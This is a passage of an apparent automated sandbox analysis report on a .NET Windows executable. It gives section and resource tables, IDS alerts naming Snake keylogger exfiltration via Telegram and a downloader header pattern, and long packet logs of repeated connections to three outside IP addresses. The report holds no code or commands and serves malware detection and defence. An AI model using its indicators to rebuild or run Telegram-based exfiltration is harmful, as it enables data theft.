                                                                            .text0x20000x42ecc0x430007f8d0ad071209c77ab0ea840cfaae91eFalse0.48775652985074625data4.140507183082097IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x460000x10e700x110000b5e960d941cf87853b305149482d79cFalse0.1569536994485294data4.3901259151281185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x580000xc0x2001f72193e62c822389f4f85f5a3174b54False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0x461000x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.1495474979297291
                                                                            RT_GROUP_ICON0x569380x14data1.15
                                                                            RT_VERSION0x5695c0x314data0.43908629441624364
                                                                            RT_MANIFEST0x56c800x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2025-01-09T11:37:54.884647+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730132.226.247.7380TCP
                                                                            2025-01-09T11:38:02.478281+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730132.226.247.7380TCP
                                                                            2025-01-09T11:38:04.075490+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449732149.154.167.220443TCP
                                                                            2025-01-09T11:38:04.352430+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449732149.154.167.220443TCP
                                                                            2025-01-09T11:38:05.400151+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449733132.226.247.7380TCP
                                                                            2025-01-09T11:38:05.986996+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449734149.154.167.220443TCP
                                                                            2025-01-09T11:38:08.388920+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449736149.154.167.220443TCP
                                                                            2025-01-09T11:38:10.786103+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449738149.154.167.220443TCP
                                                                            2025-01-09T11:38:13.177667+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449742149.154.167.220443TCP
                                                                            2025-01-09T11:38:15.643460+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449748149.154.167.220443TCP
                                                                            2025-01-09T11:38:18.088015+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449750149.154.167.220443TCP
                                                                            2025-01-09T11:38:20.527231+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449752149.154.167.220443TCP
                                                                            2025-01-09T11:38:22.995583+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449754149.154.167.220443TCP
                                                                            2025-01-09T11:38:25.903234+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449756149.154.167.220443TCP
                                                                            2025-01-09T11:38:28.472963+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449758149.154.167.220443TCP
                                                                            2025-01-09T11:38:30.832201+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449760149.154.167.220443TCP
                                                                            2025-01-09T11:38:33.170638+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449762149.154.167.220443TCP
                                                                            2025-01-09T11:38:35.536929+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449764149.154.167.220443TCP
                                                                            2025-01-09T11:38:37.873335+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449766149.154.167.220443TCP
                                                                            2025-01-09T11:38:40.252611+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449768149.154.167.220443TCP
                                                                            2025-01-09T11:38:42.606349+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449770149.154.167.220443TCP
                                                                            2025-01-09T11:38:44.942098+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449772149.154.167.220443TCP
                                                                            2025-01-09T11:38:47.295256+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449774149.154.167.220443TCP
                                                                            2025-01-09T11:38:49.765565+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449776149.154.167.220443TCP
                                                                            2025-01-09T11:38:52.213136+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449779149.154.167.220443TCP
                                                                            2025-01-09T11:38:54.592084+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449781149.154.167.220443TCP
                                                                            2025-01-09T11:38:56.925077+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449794149.154.167.220443TCP
                                                                            2025-01-09T11:38:59.293438+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449811149.154.167.220443TCP
                                                                            2025-01-09T11:39:01.642068+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449828149.154.167.220443TCP
                                                                            2025-01-09T11:39:03.384594+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449839132.226.247.7380TCP
                                                                            2025-01-09T11:39:03.961285+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449845149.154.167.220443TCP
                                                                            2025-01-09T11:39:06.283403+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449862149.154.167.220443TCP
                                                                            2025-01-09T11:39:08.587440+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449879149.154.167.220443TCP
                                                                            2025-01-09T11:39:10.891260+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449896149.154.167.220443TCP
                                                                            2025-01-09T11:39:14.434972+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449918149.154.167.220443TCP
                                                                            2025-01-09T11:39:16.808512+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449935149.154.167.220443TCP
                                                                            2025-01-09T11:39:19.182920+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449952149.154.167.220443TCP
                                                                            2025-01-09T11:39:21.009703+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449966132.226.247.7380TCP
                                                                            2025-01-09T11:39:21.689730+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449970149.154.167.220443TCP
                                                                            2025-01-09T11:39:23.978360+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449985132.226.247.7380TCP
                                                                            2025-01-09T11:39:24.569832+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449989149.154.167.220443TCP
                                                                            2025-01-09T11:39:26.572102+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450003132.226.247.7380TCP
                                                                            2025-01-09T11:39:27.126323+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.450008149.154.167.220443TCP
                                                                            2025-01-09T11:39:42.775242+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450093132.226.247.7380TCP
                                                                            2025-01-09T11:39:45.810545+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450097132.226.247.7380TCP
                                                                            2025-01-09T11:39:54.969538+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450109132.226.247.7380TCP
                                                                            2025-01-09T11:39:57.919928+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450113132.226.247.7380TCP
                                                                            2025-01-09T11:40:19.103711+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450127132.226.247.7380TCP
                                                                            2025-01-09T11:40:28.143561+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450139132.226.247.7380TCP
                                                                            2025-01-09T11:40:35.719476+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450147132.226.247.7380TCP
                                                                            2025-01-09T11:41:04.517172+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450186132.226.247.7380TCP
                                                                            2025-01-09T11:41:30.181627+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450220132.226.247.7380TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 9, 2025 11:37:53.942995071 CET4973080192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:37:53.947864056 CET8049730132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:37:53.947940111 CET4973080192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:37:53.951436043 CET4973080192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:37:53.956198931 CET8049730132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:37:54.629420042 CET8049730132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:37:54.633781910 CET4973080192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:37:54.638550997 CET8049730132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:37:54.841947079 CET8049730132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:37:54.854955912 CET49731443192.168.2.4104.21.112.1
                                                                            Jan 9, 2025 11:37:54.854998112 CET44349731104.21.112.1192.168.2.4
                                                                            Jan 9, 2025 11:37:54.855079889 CET49731443192.168.2.4104.21.112.1
                                                                            Jan 9, 2025 11:37:54.863682985 CET49731443192.168.2.4104.21.112.1
                                                                            Jan 9, 2025 11:37:54.863698006 CET44349731104.21.112.1192.168.2.4
                                                                            Jan 9, 2025 11:37:54.884646893 CET4973080192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:37:55.325793982 CET44349731104.21.112.1192.168.2.4
                                                                            Jan 9, 2025 11:37:55.325875044 CET49731443192.168.2.4104.21.112.1
                                                                            Jan 9, 2025 11:37:55.331279039 CET49731443192.168.2.4104.21.112.1
                                                                            Jan 9, 2025 11:37:55.331290007 CET44349731104.21.112.1192.168.2.4
                                                                            Jan 9, 2025 11:37:55.331547976 CET44349731104.21.112.1192.168.2.4
                                                                            Jan 9, 2025 11:37:55.384527922 CET49731443192.168.2.4104.21.112.1
                                                                            Jan 9, 2025 11:37:55.393016100 CET49731443192.168.2.4104.21.112.1
                                                                            Jan 9, 2025 11:37:55.439347029 CET44349731104.21.112.1192.168.2.4
                                                                            Jan 9, 2025 11:37:55.522272110 CET44349731104.21.112.1192.168.2.4
                                                                            Jan 9, 2025 11:37:55.522315025 CET44349731104.21.112.1192.168.2.4
                                                                            Jan 9, 2025 11:37:55.522377968 CET49731443192.168.2.4104.21.112.1
                                                                            Jan 9, 2025 11:37:55.599178076 CET49731443192.168.2.4104.21.112.1
                                                                            Jan 9, 2025 11:38:01.297662973 CET4973080192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:01.525173903 CET4973080192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:01.837662935 CET4973080192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:02.395879984 CET8049730132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:02.395895958 CET8049730132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:02.395905018 CET8049730132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:02.425370932 CET8049730132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:02.436671019 CET49732443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:02.436703920 CET44349732149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:02.436774015 CET49732443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:02.437202930 CET49732443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:02.437215090 CET44349732149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:02.478281021 CET4973080192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:04.025487900 CET44349732149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:04.025595903 CET49732443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:04.028476000 CET49732443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:04.028486013 CET44349732149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:04.028688908 CET44349732149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:04.030133963 CET49732443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:04.075331926 CET44349732149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:04.075443029 CET49732443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:04.075448036 CET44349732149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:04.352425098 CET44349732149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:04.352520943 CET44349732149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:04.352713108 CET49732443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:04.353244066 CET49732443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:04.665290117 CET4973080192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:04.666449070 CET4973380192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:04.670336962 CET8049730132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:04.670423985 CET4973080192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:04.671308041 CET8049733132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:04.671392918 CET4973380192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:04.671538115 CET4973380192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:04.676294088 CET8049733132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:05.351892948 CET8049733132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:05.363837004 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.363876104 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.363948107 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.364535093 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.364547014 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.400151014 CET4973380192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:05.984726906 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.986324072 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.986347914 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.986934900 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.986953974 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987068892 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987088919 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987200975 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987226009 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987330914 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987348080 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987361908 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987375975 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987438917 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987449884 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987464905 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987472057 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987484932 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987493992 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987564087 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987572908 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987591028 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987603903 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987647057 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987658978 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987699986 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987709999 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987716913 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987720966 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987749100 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987761974 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987781048 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987795115 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987842083 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987848043 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987864971 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987874031 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987880945 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987884045 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987931967 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987942934 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987957001 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987963915 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.987978935 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.987984896 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.988029957 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988044024 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.988082886 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988095999 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.988111019 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988118887 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.988132000 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988137007 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.988163948 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988173962 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.988244057 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988250971 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.988272905 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988280058 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.988287926 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988292933 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.988306046 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988312006 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.988389969 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988396883 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.988419056 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988425016 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.988435984 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988440990 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.988456011 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988467932 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.988521099 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988533974 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.988580942 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988636971 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988653898 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988678932 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988686085 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988693953 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988713980 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988781929 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988789082 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988818884 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988826036 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988858938 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.988910913 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.996701002 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.996968031 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:05.996978045 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:05.996990919 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:06.001351118 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:06.969944000 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:06.969959974 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:06.970012903 CET44349734149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:06.970140934 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:06.970140934 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:06.970525026 CET49734443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:07.060237885 CET4973580192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:07.065105915 CET8049735132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:07.065169096 CET4973580192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:07.065270901 CET4973580192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:07.070096016 CET8049735132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:07.747430086 CET8049735132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:38:07.754609108 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:07.754657030 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:07.754863024 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:07.755194902 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:07.755212069 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:07.790908098 CET4973580192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:38:08.386564970 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.388422966 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.388453007 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.388863087 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.388881922 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.388988972 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389014959 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389169931 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389194965 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389297962 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389313936 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389329910 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389345884 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389436960 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389457941 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389473915 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389484882 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389493942 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389499903 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389513016 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389519930 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389601946 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389616013 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389631987 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389645100 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389663935 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389672995 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389681101 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389686108 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389739990 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389739990 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389756918 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389764071 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389774084 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389774084 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389780998 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389787912 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389796972 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389801979 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389822960 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389830112 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389844894 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389844894 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389851093 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389857054 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389862061 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389866114 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389889956 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389898062 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389955997 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389962912 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.389977932 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.389988899 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.390005112 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.390011072 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.390023947 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.390029907 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.390048981 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.390054941 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.390060902 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.390065908 CET44349736149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:38:08.390089989 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.390089989 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.390111923 CET49736443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:38:08.390121937 CET49736443192.168.2.4149.154.167.220
